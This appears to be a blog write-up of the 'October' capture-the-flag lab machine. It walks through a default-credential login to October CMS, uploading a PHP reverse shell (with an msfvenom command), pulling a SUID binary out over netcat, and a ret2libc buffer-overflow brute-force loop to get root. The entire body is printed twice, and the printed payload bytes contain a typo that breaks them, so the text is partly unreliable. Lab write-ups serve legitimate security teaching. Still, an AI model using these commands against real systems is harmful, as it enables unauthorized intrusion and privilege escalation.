IP:10.10.10.16
OS:Linux
Enumeration:
October is a Tough Machine as it involved buffer overflows. If you are a sadist, you will enjoy getting root.
We start of with nmap enumeration which shows two ports open 80 and 22. Plugging the remote machines IP in our browser, we find that it running octobercms.
Running gobuster against the port 80 to bruteforce directories, we see a an interesting one called /backend which redirects us to a default login page.
Exploitation:
You can login to this CMS with default credentials; "Username: admin Password: admin" which gives us admin access.
Next we can either use a msfvenom php payload (msfvenom -p php/meterpreter/reverse_tcp lhost=IP lport=4444 -f raw > shell.php5) and a metasploit listener (multi handler exploit) to get a shell OR set up a nc listener, and upload a php shell under the media/upload tabs. Php reverse shell is available from kali(locate php-reverse-shell) and rename it with php5 extension as this is what October executes. I chose to do the latter.
Once I upload the reverse shell, I click on it and get a limited shell as www-data user.
Next I spawn a tty shell and try to find files running as root/ binaries with suid bit set.
We find an interesting binary - ovrflw that has suid (root SUID permission ) bit set. The file overflw is a ELF executable and we can get root access by exploiting it.
The link provided will teach you more on SUID and GUID permissions.https://www.linuxnix.com/sgid-set-sgid-linuxunix/br>
I then transfer the binary from the remote shell to my kali using the commands:
on remote IP: nc -w 5 10.10.14.20 999 < /usr/local/bin/ovrflw
On Kali run: nc -l -p 999 > ovrflw
I make the binary executable (chmod +x) and then open it in gdb to look at the assembly code. At line main+64 we find the strcpy function. strcpy is vulnerable to buffer overflow and we will be exploiting it. the strings command against the binary also shows the same.
First we set a breakpoint using b main command and run the program. The program reaches a break point of 0x08048480.
Second we check if security is enabled and see NX (non-executable)bit is enable meaning we can’t put our shellcode inside it. We disable ASLR with the command : echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Next we create a pattern to find the EIP offset. You can use Kali's metasploit pattern_create.rb with a length of 200 (-l 150) or use gdb with peda installed (pattern_create 200.
Restart and run the program and the pattern against it. Once the program reaches it’s break point then press c to continue and you should see a SIGSEGV and EIP overwritten at "0x64413764" in our case.
We then use pattern create and pass it gdb to pattern offset (pattern_offset ) or in kali /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x64413764)and get an offset of 112. So we need to write 112 characters and then write the address of the instructions we want to be executed.
Next we try to insert shellcode into the buffer but we were unable to execute it because of DEP enabled. This prevents code from being executed in the stack. We do a ret2libc attack to execute a process already present in the process’ executable memory. ASLR is also enabled on the target so we have no choice to brute force the address. We just have to find the address of system, exit and /bin/sh as below;
gdb /usr/local/bin/ovrflw -q
(gdb) b main
(gdb) run
(gdb) p system
(gdb) find 0xb7596310, +9999999, "/bin/sh"
(gdb) x/s 0xb76b8bac
(gdb) p exit
System = 0xb7596310
Exit = 0xb7702f34
/bin/sh = 0xb76b8bac
little endian format = “x\10\x63\x59\xb7\x60\x92\x58\xb7\xac\xb8\x6b\xb7”
We then create our exploit ("while true; do /usr/local/bin/ovrflw $(python -c 'print "A" * 112 + "x\10\x63\x59\xb7\x60\x92\x58\xb7\xac\xb8\x6b\xb7"');done") and brute force the address using bash because of ASLR. We align the address in the order: system>exit>/bin/sh. We get the root shell as soon as it matches our memory address!!
To get root, we can also modify our buf.py code and fill in the parameters from the remote shell as shown in the picture below, import it to /tmp folder and run it to get root.
We start of with nmap enumeration which shows two ports open 80 and 22. Plugging the remote machines IP in our browser, we find that it running octobercms.
Running gobuster against the port 80 to bruteforce directories, we see a an interesting one called /backend which redirects us to a default login page.
Exploitation:
You can login to this CMS with default credentials; "Username: admin Password: admin" which gives us admin access.
Next we can either use a msfvenom php payload (msfvenom -p php/meterpreter/reverse_tcp lhost=IP lport=4444 -f raw > shell.php5) and a metasploit listener (multi handler exploit) to get a shell OR set up a nc listener, and upload a php shell under the media/upload tabs. Php reverse shell is available from kali(locate php-reverse-shell) and rename it with php5 extension as this is what October executes. I chose to do the latter.
Once I upload the reverse shell, I click on it and get a limited shell as www-data user.
Next I spawn a tty shell and try to find files running as root/ binaries with suid bit set.
We find an interesting binary - ovrflw that has suid (root SUID permission ) bit set. The file overflw is a ELF executable and we can get root access by exploiting it.
The link provided will teach you more on SUID and GUID permissions.https://www.linuxnix.com/sgid-set-sgid-linuxunix/br>
I then transfer the binary from the remote shell to my kali using the commands:
on remote IP: nc -w 5 10.10.14.20 999 < /usr/local/bin/ovrflw
On Kali run: nc -l -p 999 > ovrflw
I make the binary executable (chmod +x) and then open it in gdb to look at the assembly code. At line main+64 we find the strcpy function. strcpy is vulnerable to buffer overflow and we will be exploiting it. the strings command against the binary also shows the same.
First we set a breakpoint using b main command and run the program. The program reaches a break point of 0x08048480.
Second we check if security is enabled and see NX (non-executable)bit is enable meaning we can’t put our shellcode inside it. We disable ASLR with the command : echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Next we create a pattern to find the EIP offset. You can use Kali's metasploit pattern_create.rb with a length of 200 (-l 150) or use gdb with peda installed (pattern_create 200.
Restart and run the program and the pattern against it. Once the program reaches it’s break point then press c to continue and you should see a SIGSEGV and EIP overwritten at "0x64413764" in our case.
We then use pattern create and pass it gdb to pattern offset (pattern_offset ) or in kali /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x64413764)and get an offset of 112. So we need to write 112 characters and then write the address of the instructions we want to be executed.
Next we try to insert shellcode into the buffer but we were unable to execute it because of DEP enabled. This prevents code from being executed in the stack. We do a ret2libc attack to execute a process already present in the process’ executable memory. ASLR is also enabled on the target so we have no choice to brute force the address. We just have to find the address of system, exit and /bin/sh as below;
gdb /usr/local/bin/ovrflw -q
(gdb) b main
(gdb) run
(gdb) p system
(gdb) find 0xb7596310, +9999999, "/bin/sh"
(gdb) x/s 0xb76b8bac
(gdb) p exit
System = 0xb7596310
Exit = 0xb7702f34
/bin/sh = 0xb76b8bac
little endian format = “x\10\x63\x59\xb7\x60\x92\x58\xb7\xac\xb8\x6b\xb7”
We then create our exploit ("while true; do /usr/local/bin/ovrflw $(python -c 'print "A" * 112 + "x\10\x63\x59\xb7\x60\x92\x58\xb7\xac\xb8\x6b\xb7"');done") and brute force the address using bash because of ASLR. We align the address in the order: system>exit>/bin/sh. We get the root shell as soon as it matches our memory address!!
To get root, we can also modify our buf.py code and fill in the parameters from the remote shell as shown in the picture below, import it to /tmp folder and run it to get root.
Comments
Post a Comment